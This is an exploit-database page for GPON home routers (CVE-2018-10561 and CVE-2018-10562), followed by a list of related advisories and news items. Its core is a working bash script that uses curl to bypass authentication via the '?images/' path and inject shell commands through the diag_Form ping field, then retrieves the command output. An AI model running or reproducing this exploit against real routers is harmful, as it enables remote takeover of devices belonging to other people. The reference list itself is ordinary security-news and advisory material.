Lucene search
Vpnmentor1337DAY-ID-30298HistoryMay 03, 2018 - 12:00 a.m.
GPON Routers - Authentication Bypass / Command Injection Exploit
2018-05-0300:00:00
vpnmentor
0day.today
1176
0.974 High
EPSS
Percentile
99.9%
Exploit for hardware platform in category remote exploits
#!/bin/bash
echo "[+] Sending the Command… "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting…."
sleep 3
echo "[+] Retrieving the ouput…."
curl -k $1/diag.html?images/ 2>/dev/null | grep ‘diag_result = ‘ | sed -e ‘s/\\n/\n/g’
# 0day.today [2018-05-07] #Related
packetstorm
packetstorm
GPON Router Authentication Bypass / Comand Injection
2018-05-04 00:00:00
threatpost
threatpost
D-Link, Dasan Routers Under Attack In Yet Another Assault
2018-07-20 20:24:12
Millions of Home Fiber Routers Vulnerable to Complete Takeover
2018-05-01 21:21:14
Inside the Hoaxcalls Botnet: Both Success and Failure
2020-05-28 21:10:01
kitploit
kitploit
GPON - Python Exploit For Remote Code Executuion On GPON Home Routers (CVE-2018-10562)
2018-05-09 21:34:00
Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts
2018-11-24 12:43:00
Sn1per v5.0 - Automated Pentest Recon Scanner
2018-07-05 13:45:00
cisa_kev
cisa_kev
Dasan GPON Routers Authentication Bypass Vulnerability
2022-03-31 00:00:00
Dasan GPON Routers Command Injection Vulnerability
2022-03-31 00:00:00
seebug
seebug
Critical RCE Vulnerability Found in Over a Million GPON Home Routers
2018-05-02 00:00:00
openvas
openvas
GPON Routers Multiple Vulnerabilities
2018-05-03 00:00:00
thn
thn
Hackers are exploiting a new zero-day flaw in GPON routers
2018-05-23 09:15:00
5 Powerful Botnets Found Exploiting Unpatched GPON Router Flaws
2018-05-10 14:38:00
A Simple Tool Released to Protect Dasan GPON Routers from Remote Hacking
2018-05-08 13:05:00
qualysblog
qualysblog
Timely Password-Change Call from Twitter, as Bugs Hit WebEx and GPON routers
2018-05-08 01:08:05
Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
2019-12-27 18:01:22
cve
cve
CVE-2018-10562
2018-05-04 03:29:00
CVE-2018-10561
2018-05-04 03:29:00
nessus
nessus
GPON ONT Home Gateway Router is vulnerable to authentication bypass (CVE-2018-10561)
2018-12-19 00:00:00
GPON ONT Home Gateway Router is vulnerable to authenticated remote command execution (CVE-2018-10562)
2018-12-19 00:00:00
GPON ONT Home Gateway Authenticated Remote Command Execution (CVE-2019-3920)
2019-03-28 00:00:00
prion
prion
Authentication flaw
2018-05-04 03:29:00
Command injection
2018-05-04 03:29:00
checkpoint_advisories
checkpoint_advisories
Dasan GPON Router Remote Command Injection (CVE-2018-10562)
2018-05-13 00:00:00
Dasan GPON Router Authentication Bypass (CVE-2018-10561)
2018-05-13 00:00:00
attackerkb
attackerkb
CVE-2018-10562
2018-05-04 00:00:00
CVE-2018-10561
2018-05-04 00:00:00
nuclei
nuclei
Dasan GPON Devices - Remote Code Execution
2022-04-02 14:56:35
exploitpack
exploitpack
Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
2019-02-28 00:00:00
exploitdb
exploitdb
Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
2019-02-28 00:00:00
myhack58
myhack58
securelist
securelist
New trends in the world of IoT threats
2018-09-18 10:00:36
mmpc
mmpc
Microsoft research uncovers new Zerobot capabilities
2022-12-21 20:00:00
mssecure
mssecure
Microsoft research uncovers new Zerobot capabilities
2022-12-21 20:00:00